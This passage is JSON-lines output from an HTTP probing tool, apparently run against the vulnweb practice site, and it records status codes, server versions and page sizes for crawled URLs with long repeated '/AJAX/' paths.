JAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/style.css\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/style.css\",\"time\":\"352.695293ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.095970006Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/userinfo.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/userinfo.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/userinfo.php\",\"time\":\"344.560436ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.225588628Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/artists.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/artists.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/artists.php\",\"time\":\"353.461525ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.286852215Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/cart.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/cart.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/cart.php\",\"time\":\"348.8081ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.306373544Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/categories.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/categories.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/categories.php\",\"time\":\"341.274366ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.349669106Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/disclaimer.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/disclaimer.php\",\"time\":\"346.192223ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.400411803Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/guestbook.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/guestbook.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/guestbook.php\",\"time\":\"345.248391ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.559856097Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/index.php\",\"time\":\"343.022035ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.631444699Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=1\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=1\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=1\",\"time\":\"340.165257ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:41.647349083Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=2\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=2\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=2\",\"time\":\"344.956505ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}